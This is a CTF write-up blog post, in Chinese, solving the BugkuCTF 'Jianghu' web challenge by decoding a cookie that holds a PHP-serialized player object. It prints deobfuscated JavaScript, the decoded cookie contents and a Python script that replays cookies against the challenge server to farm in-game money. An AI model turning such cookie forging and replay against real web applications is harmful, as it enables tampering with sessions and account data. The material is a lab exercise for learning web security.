BugkuCTF 江湖 - CDUSEC内部博客

BugkuCTF 江湖

分类栏目: WEB

117℃

降龙 发布于 发表评论

进题目以后,玩了一会儿,发现必须修炼满四个属性,再购买如来神掌,方可击败蒙老魔。

如下图所示。

1.png

所以这题是怎么做的呢?

2.png

首先我们注意下,每次练功,或者赚钱,都会生成新的Cookie,很容易想到题目是用Cookie保存练功的凭证,于是我练功了4次,想从中找到规律。

不过这个Cookie的base64值解密后并不是明文,我将它修改为16进制格式,4次练功还是有些规律的,某些字符的16进制数是在有规律的变动。


\x51 \x3c \x3b \x3c \x2c \x6a \x7b \x71 
\x63 \x70 \x2e \x36 \x39 \x38 \x4e \x8d 
\x6b \x52 \x50 \x56 \x30 \x6e \x6f \x7d 
\x6a \x69 \x73 \x6c \x6d \x30 \x23 \x73 
\x1e \x1f \x18 [\x19 | \x1e | \x1f | \x1c] \x14 \x67 \x59 \x62 \x67  练功
\x14 \x0c \x58 \x41 \x43 \x5e \x5f \x04 
\x75 \x45 \x0e \x09 \x0d [\x0e | \x0f | \x08 | \x09] \x0e \x77 \x4d  练功
\x7a \x07 \x7e \x16 \x52 \x51 \x56 \x59 
\x35 \x68 \x01 \x31 \x00 \x06 \x71 [\x7e | \x7f | \x7c | \x7d] \x79  练功
\x3f \x76 \x76 \x0a \x66 \x20 \x3d \x36 
\x39 \x3e \x3f \x74 \x15 \x25 \x14 \x68 
\x62 [\x63 | \x64 | \x65 | \x66] \x1f \x2f \x66 \x67 \x62 \x76 \x21  练功
\x09 \x13 \x13 \x19 \x14 \x0f \x40 \x27 
\x07 \x28 \x52 \x2f \x11 \x28 \x57 \x52 
\x56 \x02 \x19 \x03 \x1b \x0d \x0e \x05 
\x5c \x47 \x17 \x44 \x4a \x3f \x05 \x3c 
\xc1 \xc4 \xa6 \xee \xe9 \xf6 \xeb \x07 
\xe1 \xfe \xa6 \xcd \xe7 \xb0 \xba \xcf 
\xe9 \xd0 \xac \xd0 \xb8 \x11 \xf1 \xf8 
\xf5 \xff \xee \xb2 \xdf \xef \xda \xa4 
\x9d \xd7 \x9c \x99 \xe4 \x8c \xd3 \xdf 
\xd0 \xd9 \xd1 \x8e \x93 \xc3 \xee
\x97 [\x96 | \x95 | \x94 | \x93] \x88 \x88 \xf7 \xcd \x88 \x82 \x88 \x90  赚钱
\xd4 \xca \xd3 \xcb \x90 \xfb \xcb \x82 
\xf5 \xfe \xea \xf4 \xee \x81 \x41 



然后又看了一眼商店

3.png

果然钱是硬道理,so,我把金钱那个字节改成00,计算了一下,应该能赚到15000....结果并不是这样,改了以后回来的Cookie里面的东西和传入的完全不同,绝对是改错了。


后面追了一遍打败蒙老魔用到的Js,在重重混淆中解密出如下Js代码:


p = '7 s(t){5 m=t+"=";5 8=9.cookie.n(\';\');o(5 i=0;i<8.d;i++){5 c=8[i].trim();u(c.v(m)==0)p c.substring(m.d,c.d)}p""}7 w(a){5 x=new Base64();5 q=x.decode(a);5 r="";o(i=0;i<q.d;i++){5 b=q[i].charCodeAt();b=b^i;b=b-((i%10)+2);r+=String.fromCharCode(b)}p r}7 ertqwe(){5 y="user";5 a=s(y);a=decodeURIComponent(a);5 z=w(a);5 8=z.n(\';\');5 e="";o(i=0;i<8.d;i++){u(-1<8[i].v("A")){e=8[i+1].n(":")[2]}}e=e.B(\'"\',"").B(\'"\',"");9.write(\'<img id="f-1" g="h/1-1.k">\');j(7(){9.l("f-1").g="h/1-2.k"},1000);j(7(){9.l("f-1").g="h/1-3.k"},2000);j(7(){9.l("f-1").g="h/1-4.k"},3000);j(7(){9.l("f-1").g="h/6.png"},4000);j(7(){alert("{"+md5(e)+"}")},5000)}'
a = []
c = 38
k = '|||||var||function|ca|document|temp|num||length|key|attack|src|image||setTimeout|jpg|getElementById|name|split|for|return|result|result3|getCookie|cname|if|indexOf|decode_create|base|temp_name|mingwen|flag|replace'.split('|')
e = 0
r = {}
e = function(c) {
    return (c < 62 ? '': e(parseInt(c / 62))) + ((c = c % 62) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
};
if ('0'.replace(0, e) == 0) {
    while (c--) r[e(c)] = k[c];
    k = [function(e) {
        return r[e] || e
    }];
    e = function() {
        return '[57-9abd-hj-zAB]'
    };
    c = 1
};
while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
return p
最终代码



function getCookie(cname) {
    var name = cname + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i].trim();
        if (c.indexOf(name) == 0) return c.substring(name.length, c.length)
    }
    return ""
}
function decode_create(temp) {
    var base = new Base64();
    var result = base.decode(temp);
    var result3 = "";
    for (i = 0; i < result.length; i++) {
        var num = result[i].charCodeAt();
        num = num ^ i;
        num = num - ((i % 10) + 2);
        result3 += String.fromCharCode(num)
    }
    return result3
}
function ertqwe() {
    var temp_name = "user";
    var temp = getCookie(temp_name);
    temp = decodeURIComponent(temp);
    var mingwen = decode_create(temp);
    var ca = mingwen.split(';');
    var key = "";
    for (i = 0; i < ca.length; i++) {
        if ( - 1 < ca[i].indexOf("flag")) {
            key = ca[i + 1].split(":")[2]
        }
    }
    key = key.replace('"', "").replace('"', "");
    document.write('<img id="attack-1" src="image/1-1.jpg">');
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/1-2.jpg"
    },
    1000);
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/1-3.jpg"
    },
    2000);
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/1-4.jpg"
    },
    3000);
    setTimeout(function() {
        document.getElementById("attack-1").src = "image/6.png"
    },
    4000);
    setTimeout(function() {
        alert("{" + md5(key) + "}")
    },
    5000)
}



我们随便传入一个他生成的Cookie进行调试,Cookie通过decode_create()函数后返回如下:


O:5:"human":10:{s:8:"xueliang";i:18000;s:5:"neili";i:18000;s:5:"lidao";i:3000;s:6:"dingli";i:3000;s:7:"waigong";i:1;s:7:"neigong";i:1;s:7:"jingyan";i:1;s:6:"yelian";i:1;s:5:"money";i:100;s:4:"flag";s:9:"827949417";}


这是我已经学完如来神掌的Cookie解密出的,很明显是一段由php对象生成的序列化字符串,而且我们的flag,就应该是flag属性的数值进行md5加密后的结果。


解题思路就是伪造一个金钱为140000的cookie,顺理成章的打败蒙老魔。

通过逆向decode_create()函数,得到序列化字符串一个加密函数,修改金额后伪造cookie,即可获取flag。


不过我本人没这么做....昨晚太困了,写了个脚本刷银两去了,刷到140000,早上起来get flag,一血美滋滋。

懒人EXP:

# -*- coding: UTF-8 -*-
import requests
import re

def txt_wrap_by(start_str, end, html):
	start = html.find(start_str)
	if start >= 0:
		start += len(start_str)
		end = html.find(end, start)
		if end >= 0:
			return html[start:end].strip()

url = 'http://123.206.31.85:1616/wulin.php?action=map&n=4'
url_mon = 'http://123.206.31.85:1616/wulin.php?action=map&n=1'
coo = 'UTw7PCxqe3FjcC42OThOjWtSUFYwbm99amlzbG0wI3MeHxwUZ1liZxQMWEFDXl8EdUUOCQkOd016B34WUlFWWTVoATEABn15P3Z2CmYgPTY5Pj90FSUUaGYfL2ZnYnYhCRMTGRQPQCcHKFIvEShXUlYCGQMbDQ4FXEcXREo/BTzBxKbu6fbrB%2bH%2bps3nsLrP6dCs0LgR8fj1/%2b6y3%2b/apJ3XnJnkjNPf0NnRjpPD7u%2bIiPfNiIKIkNTK08uQ%2b8uC9f7q9O6BQQ%3d%3d'
pre_coo = ''

while coo != pre_coo:
	cookie = dict(user = coo)
	res = requests.get(url, cookies = cookie)
	pre_coo = coo
	coo = txt_wrap_by('user=',';',res.headers['Set-Cookie'])
	cookie = dict(user = coo)
	res = requests.get(url_mon, cookies = cookie)
	money = re.findall(r"金钱:(.+?)两",res.text)[0]
	print int(money)
	if int(money) > 140000:
		print 'Now-cookie: ' + coo
		print 'Pre-Cookie: ' + pre_coo
		exit()
4.png

  友情赞助
微信二维码
支付宝二维码
  选择分享方式

标签: 代码审计 Python

版权:若无特殊注明,本文皆为降龙原创,转载请保留文章出处。

链接:BugkuCTF 江湖 - http://cdusec.happyhacking.top/?post=73